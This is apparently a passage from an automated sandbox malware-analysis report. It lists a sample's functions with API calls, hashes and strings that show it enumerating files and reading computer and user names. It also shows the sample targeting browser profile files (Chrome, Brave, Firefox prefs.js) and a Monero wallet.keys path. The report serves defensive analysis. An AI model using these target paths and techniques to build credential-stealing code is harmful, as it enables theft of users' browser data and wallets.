                    • Opcode Fuzzy Hash: d03670be5a0e894e0ceeb1583aa3b29b3a09a0901fbcb6d44efbf5c05955dc65
                    • Instruction Fuzzy Hash: 5CE0E670955308FBE710ABA19D0EB097678AB04B02F104155F709771D0DAB52A4497D9
                    Function 009510A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009510B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009510F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: eea81df2ecb034081eab8970e4b2e969b6dab16b55cc5a3597d7a091d4c44e9d
                    • Instruction ID: 196f5641a1edb99375ecba4ca0c730a6e38bc0f36cfcacaea84472ccd0cac861
                    • Opcode Fuzzy Hash: eea81df2ecb034081eab8970e4b2e969b6dab16b55cc5a3597d7a091d4c44e9d
                    • Instruction Fuzzy Hash: 10F0E271641208BBEB14DAB4AC5AFBBB7ECE705B15F300848F904E3280D9719E04CBA1
                    Function 00951190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 009678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967910
                      • Part of subcall function 009678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00967917
                      • Part of subcall function 009678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0096792F
                      • Part of subcall function 00967850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967880
                      • Part of subcall function 00967850: RtlAllocateHeap.NTDLL(00000000), ref: 00967887
                      • Part of subcall function 00967850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096789F
                    • ExitProcess.KERNEL32 ref: 009511C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: 219fad0e68d235923b5b1f44dd7fcc484ffe8b07dd1f3bf549f7f65547f7747c
                    • Instruction ID: cc17d63d1636c6277f400c63b911ef79f32bc0215c11208dc66187d00dd65faa
                    • Opcode Fuzzy Hash: 219fad0e68d235923b5b1f44dd7fcc484ffe8b07dd1f3bf549f7f65547f7747c
                    • Instruction Fuzzy Hash: B3E05BB591430153DA0073F1BD8BB2B379C5B5434EF040925FE05D3102FE25FC0486A6

                    Non-executed Functions

                    Function 009638B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 009638CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 009638E3
                    • lstrcat.KERNEL32(?,?), ref: 00963935
                    • StrCmpCA.SHLWAPI(?,00970F70), ref: 00963947
                    • StrCmpCA.SHLWAPI(?,00970F74), ref: 0096395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00963C67
                    • FindClose.KERNEL32(000000FF), ref: 00963C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: f2642dad110a3da3b56f81fa148d2efbcfd34cb795228fc49f7f1f7cb346a52b
                    • Instruction ID: 47f8927d481b5bdb3a3bc7ba4af56d26e6d8ac406f69ebc17ba4708897db62ee
                    • Opcode Fuzzy Hash: f2642dad110a3da3b56f81fa148d2efbcfd34cb795228fc49f7f1f7cb346a52b
                    • Instruction Fuzzy Hash: 25A11EB2A002189BDB24DFA4DD85FEA737CBB98300F448589F54D97141EB759B84CFA2
                    Function 00964910 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 0096492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00964943
                    • StrCmpCA.SHLWAPI(?,00970FDC), ref: 00964971
                    • StrCmpCA.SHLWAPI(?,00970FE0), ref: 00964987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00964B7D
                    • FindClose.KERNEL32(000000FF), ref: 00964B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*$h[
                    • API String ID: 180737720-897309356
                    • Opcode ID: 75fc9df7d8c160a719fdbb2ce995cffb2e2938e14565cd307d9bdea7d633cdef
                    • Instruction ID: 955f191f1c0c9fbbdc3dfcf6986cca826e5f2d09e80906339dcf5e36233c2f0f
                    • Opcode Fuzzy Hash: 75fc9df7d8c160a719fdbb2ce995cffb2e2938e14565cd307d9bdea7d633cdef
                    • Instruction Fuzzy Hash: 866123B2910218ABCB24EBA0DD85FEA737CBB88701F048589F50997141EF75AB85CF91
                    Function 0095BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00970B32,00970B2B,00000000,?,?,?,009713F4,00970B2A), ref: 0095BEF5
                    • StrCmpCA.SHLWAPI(?,009713F8), ref: 0095BF4D
                    • StrCmpCA.SHLWAPI(?,009713FC), ref: 0095BF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095C7BF
                    • FindClose.KERNEL32(000000FF), ref: 0095C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: ad9ec75c4b0fb41c5f7429bec3bcd548deb861b7453f46877119ee2d67559be7
                    • Instruction ID: be9e2bbf33ed32acd29f49ccc8f4e17d54600aba80bb8217e63c0b613f04a5ff
                    • Opcode Fuzzy Hash: ad9ec75c4b0fb41c5f7429bec3bcd548deb861b7453f46877119ee2d67559be7
                    • Instruction Fuzzy Hash: 11422272910104ABDB14FB70DD96FEE737DABD4300F408559B90AA7191EE34AB49CFA2
                    Function 00964570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00964580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00964587
                    • wsprintfA.USER32 ref: 009645A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 009645BD
                    • StrCmpCA.SHLWAPI(?,00970FC4), ref: 009645EB
                    • StrCmpCA.SHLWAPI(?,00970FC8), ref: 00964601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0096468B
                    • FindClose.KERNEL32(000000FF), ref: 009646A0
                    • lstrcat.KERNEL32(?,005BE768), ref: 009646C5
                    • lstrcat.KERNEL32(?,005BDCC0), ref: 009646D8
                    • lstrlen.KERNEL32(?), ref: 009646E5
                    • lstrlen.KERNEL32(?), ref: 009646F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*$h[
                    • API String ID: 671575355-2171546709
                    • Opcode ID: d54a464cab62ce134f2d795c8bec0cf1b19840e57b2050aa32247128d8f2cc80
                    • Instruction ID: 4172bb8b92c95a529c7787f6fff1b4a7bd9f2e4bb633da31e26c280f3660594c
                    • Opcode Fuzzy Hash: d54a464cab62ce134f2d795c8bec0cf1b19840e57b2050aa32247128d8f2cc80
                    • Instruction Fuzzy Hash: 445136B25502189BCB24EBB0DD89FEE737CAB94700F404589F60997190EF749B85CF92
                    Function 00963EA0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 133fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 00963EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00963EDA
                    • StrCmpCA.SHLWAPI(?,00970FAC), ref: 00963F08
                    • StrCmpCA.SHLWAPI(?,00970FB0), ref: 00963F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0096406C
                    • FindClose.KERNEL32(000000FF), ref: 00964081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$h[$[
                    • API String ID: 180737720-3744901406
                    • Opcode ID: 722d6d20ed1474af35b8b392265556994355e3c97c097a9b78eb76675e6b0dc0
                    • Instruction ID: 0ffccc483d920072faf9a65f479931690a27ce10449ee97d74a50ea2388fe884
                    • Opcode Fuzzy Hash: 722d6d20ed1474af35b8b392265556994355e3c97c097a9b78eb76675e6b0dc0
                    • Instruction Fuzzy Hash: 8B5158B2910218ABCB24EBB0DD85FEA737CBB84300F448589B65997150EF75EB85CF91
                    Function 0095ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 0095ED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 0095ED55
                    • StrCmpCA.SHLWAPI(?,00971538), ref: 0095EDAB
                    • StrCmpCA.SHLWAPI(?,0097153C), ref: 0095EDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095F2AE
                    • FindClose.KERNEL32(000000FF), ref: 0095F2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: 54350a99be87fd4b61c72b2c09f8ec691f1d6308da22712825f557d222f3d7eb
                    • Instruction ID: e397c0976e7cd5add79a5e82c9b1b57d4712bd5780d71b5d3fd67a0c17ced21b
                    • Opcode Fuzzy Hash: 54350a99be87fd4b61c72b2c09f8ec691f1d6308da22712825f557d222f3d7eb
                    • Instruction Fuzzy Hash: 35E1B0729111189ADB58FB60DD92FEE7338AF94340F404599B50A73092EF306F8ACF96
                    Function 0095F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009715B8,00970D96), ref: 0095F71E
                    • StrCmpCA.SHLWAPI(?,009715BC), ref: 0095F76F
                    • StrCmpCA.SHLWAPI(?,009715C0), ref: 0095F785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095FAB1
                    • FindClose.KERNEL32(000000FF), ref: 0095FAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: 1ba81a1b221e0f53d02410b9ab9bf2f35772c60b9b5e0f7f7df5a4e8019d670e
                    • Instruction ID: 8a6e36f0c468600732a4f305ba204d59424842054df753ac92c2c60fb6b4bc8b
                    • Opcode Fuzzy Hash: 1ba81a1b221e0f53d02410b9ab9bf2f35772c60b9b5e0f7f7df5a4e8019d670e
                    • Instruction Fuzzy Hash: 78B142719001089BDB24FF64DD96FEE7379AFD4300F5085A9A90AA7191EF306B49CF92
                    Function 009516D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0097510C,?,?,?,009751B4,?,?,00000000,?,00000000), ref: 00951923
                    • StrCmpCA.SHLWAPI(?,0097525C), ref: 00951973
                    • StrCmpCA.SHLWAPI(?,00975304), ref: 00951989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00951D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00951DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00951E20
                    • FindClose.KERNEL32(000000FF), ref: 00951E32
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    Strings
                    Memory Dump Source
